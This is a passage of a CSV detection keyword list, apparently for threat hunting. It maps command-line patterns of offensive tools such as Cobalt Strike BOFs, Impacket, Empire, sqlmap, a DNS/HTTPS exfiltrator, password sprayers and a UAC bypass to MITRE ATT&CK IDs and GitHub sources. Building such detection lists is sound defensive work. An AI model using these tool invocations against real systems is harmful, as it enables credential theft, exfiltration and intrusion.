T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Source c:\windows\*.exe -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"* -Source c:\windows\system32\*.dll -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"* spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"* -spn cifs* -session * -clsid * -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* SpoolFool *.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* spoolsploit *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* spray -ep ex-plan.s365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssh-hostkey.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssh-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* ssh-publickey-acceptance.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssh-run.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sshv1.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-ccs-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-cert.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-cert-intaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-dh-params.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-enum-ciphers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-heartbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-known-key.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"* sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"* st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & 